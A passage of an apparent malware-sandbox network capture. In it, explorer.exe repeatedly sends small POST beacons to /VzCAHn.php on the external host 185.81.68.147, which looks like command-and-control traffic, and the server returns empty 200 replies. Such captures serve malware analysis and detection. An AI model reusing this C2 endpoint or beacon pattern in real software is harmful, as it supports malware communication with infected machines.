                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.499738932 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:11.977449894 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:11 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      17192.168.2.849727185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.209316015 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.329387903 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:13.907170057 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:12 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      18192.168.2.849728185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.131262064 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.251113892 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.585200071 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:14 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      19192.168.2.849729185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.817451954 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.937410116 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.414372921 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:16 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      20192.168.2.849730185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.666030884 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.785824060 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.113224983 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:18 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      21192.168.2.849731185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.348532915 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.468347073 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:20.974447966 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:20 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      22192.168.2.849732185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.241589069 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.361685038 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.847784042 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:21 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      23192.168.2.849733185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.083045959 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.206089020 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.526674986 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:23 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      24192.168.2.849734185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.754704952 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.874495029 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.420753956 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:25 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      25192.168.2.849735185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.645086050 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.765218973 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.088109016 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:27 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      26192.168.2.849737185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.318084002 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.438239098 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:29.931962967 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:28 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      27192.168.2.849738185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.180257082 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.300081968 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.775763988 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:30 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      28192.168.2.849739185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.004715919 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.124694109 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.467807055 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:32 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      29192.168.2.849740185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.729636908 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.850929022 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.305931091 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:34 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      30192.168.2.849741185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.536997080 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.656914949 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.023227930 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:36 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      31192.168.2.849743185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.318870068 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.438743114 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.728254080 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:37 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      32192.168.2.849749185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.959027052 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:39.082844973 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.407073975 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:39 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      33192.168.2.849750185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.646014929 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.766767979 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.078356028 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:41 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      34192.168.2.849756185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.302988052 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.422765017 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:44.022567034 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:42 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      35192.168.2.849762185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:44.254667044 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:44.374815941 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:45.733737946 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:44 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      36192.168.2.849768185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:45.957859039 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:46.077785015 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:47.441875935 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:46 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
